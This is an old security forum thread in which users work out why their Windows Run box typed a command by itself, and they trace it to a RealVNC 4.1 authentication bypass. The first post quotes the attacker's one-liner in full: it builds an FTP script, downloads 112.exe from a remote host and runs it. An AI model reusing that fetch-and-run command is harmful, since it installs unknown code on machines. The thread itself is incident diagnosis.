intrusion or virus?

Networking/Security Forums -> Firewalls // Intrusion Detection - External Security

Author: calvin43 PostPosted: Fri Nov 03, 2006 4:42 pm    Post subject: intrusion or virus?
    ----
Hi all,
i would like to get some help, my Start > Run box open by itself and i can see this string as someone was typing it in
cmd.exe /c del i&echo open 81.128.84.212 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit
obviusly 81.128.84.212 was my ip address.
I cant get rid of it.
Any help will be very appreciated.
thanks
davide

Author: kinoluxLocation: Luxembourg PostPosted: Mon Nov 06, 2006 2:04 am    Post subject: VNC server running?
    ----
Hi Davide,

I also have same problem since Friday. Do you have VNC server on your PC always running? Then disabling it may help.
I found that VNC Server icon on task tray was in Black when I had such problem, as if "somebody" was connecting and playing with my PC Shocked
I think it's due to a kind of virus program which is running on my PC and simulating remote control....
Probably it's very new virus and no anti-virus program can detect yet? I tried 2 checking programs (CA and Trend-Micro) but didn't find anything.

kino

Author: calvin43 PostPosted: Mon Nov 06, 2006 10:19 am    Post subject: Intrusion or virus
    ----
Hi Kino,
yes i do have VNC 4.1. free edition and i have done the upgrade to the 4.2.6 version. Actually it seems that the problem stop. But i think that i still have the program on my pc. I think its a rootkit. My AVG Antivirus and Spyware doctor antispyware cant see that malware. To monitor what happening on my computer i downloaded these programs : net alert 2001 http://members.ozemail.com.au/~aschnaider/netalert.htm
curr ports
http://www.nirsoft.net/
to detect rootkit and protect i use : cyberhawk and sophos anti rootkit
http://www.novatix.com/Cyberhawk/
http://www.sophos.it/products/free-tools/sophos-anti-rootkit.html
to check the status of my vulnerability i used Shields Up! on this site
http://www.grc.com/default.htm
Anyway i have seen around that we arent just us with that problem.
davide

Author: Sgt_BLocation: Chicago, IL US PostPosted: Mon Nov 06, 2006 11:37 pm    Post subject:
    ----
Good times with the RealVNC 4.1 Authentication Bypass Vulnerability
Patching your system should reduce the risk that you'll be compromised again. An attacker can use leverage this issue against you in order to establish a remote session with your PC without knowing your VNC password. This isn't just you.

Post exploitation the attacker appeared to create an FTP script in order to download a utility named 112.exe. This is likely a backdoor/rootkit/nasty nasty thing designed to allow the attacker to maintain control over your machine.

Getting rid of it? Well I've got no idea what 112.exe is but you may want to head over to the HijackThis forum on this site. They're insanely intelligent when it comes to these kinds of things, and maybe they'll be able to help you out.

Author: Micro-Shock PostPosted: Thu Nov 09, 2006 2:41 am    Post subject: Intrusion or virus
    ----
Hey....
was wondering if there was an update to this. I have been getting the same thing... everytime though it is a diffrent exe file ... on each machine. is there a new worm out that is doing this automated now? seen 3 computers.. diffrent exe file names.... and located in 3 diffrent countries... trying to find a common link between them.

Thanks for any information you can provide. I am at a loss.... I would think VNC ... 4.1.1 but... at least one of the users.... running a firewall on the laptop... plus a hardware firewall/GW and managed to get the same thing....

virus scans turn up nothing...

Author: calvin43 PostPosted: Thu Nov 09, 2006 1:57 pm    Post subject:
    ----
I upgraded VNC Viewer to the professional version and the problem has gone.
davide



Networking/Security Forums -> Firewalls // Intrusion Detection - External Security


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group